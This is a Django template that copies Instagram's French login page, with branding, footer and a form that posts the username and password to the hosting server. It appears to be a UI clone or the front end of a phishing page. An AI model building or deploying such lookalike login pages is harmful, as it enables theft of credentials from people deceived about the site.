<!DOCTYPE html>
{% load static %}
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion • Instagram</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css">
    <link rel="stylesheet" href="{% static './style.css' %}">
</head>
<body>
    <main class="main">
        <div class="login-container">
            <h1 class="brand"><img src="{% static 'assets/logo.svg' %}" alt="Instagram"></h1>
            <form method="post">
                {% csrf_token %}
                
                <input type="text" name="{{ form.username.name }}" placeholder="{{ form.username.field.widget.attrs.placeholder }}" required>
                
                <input type="password" name="{{ form.password.name }}" placeholder="{{ form.password.field.widget.attrs.placeholder }}" required>
                
                <button type="submit" class="login-btn">Se connecter</button>
            </form>
            <div class="separator"><div>OU</div></div>
            <button class="facebook-login"><i class="fa-brands fa-facebook icon-facebook"></i><p>Se connecter avec facebook</p></button>
            <a href="#" class="forgot-password">Mot de passe oublié ?</a>
        </div>
        <div class="signup-container">
            <p class="signup-text">Vous n’avez pas de compte ? <a href="#">Inscrivez-vous</a></p>
        </div>
        <div class="download-container">
            <h3>Téléchargez l'application.</h3>
            <div class="download-icon-box">
                <img class="download-icon" src="{% static 'assets/googleplay.png' %}"/>
                <img class="download-icon" src="{% static 'assets/windows.png' %}"/>
            </div>
        </div>
    </main>
    <footer class="footer">
        <div class="footer-item">Meta</div>
        <div class="footer-item">À propos</div>
        <div class="footer-item">Blog</div>
        <div class="footer-item">Emplois</div>
        <div class="footer-item">Aide</div>
        <div class="footer-item">API</div>
        <div class="footer-item">Confidentialité</div>
        <div class="footer-item">Conditions</div>
        <div class="footer-item">Lieux</div>
        <div class="footer-item">Instagram Lite</div>
        <div class="footer-item">Threads</div>
        <div class="footer-item">Importation des contacts et non-utilisateurs</div>
        <div class="footer-item">Meta Verified</div>
        <div class="footer-item-copyright" >&copy; 2025 Instagram par Meta</div>
    </footer>
    
    
    
</body>
</html>
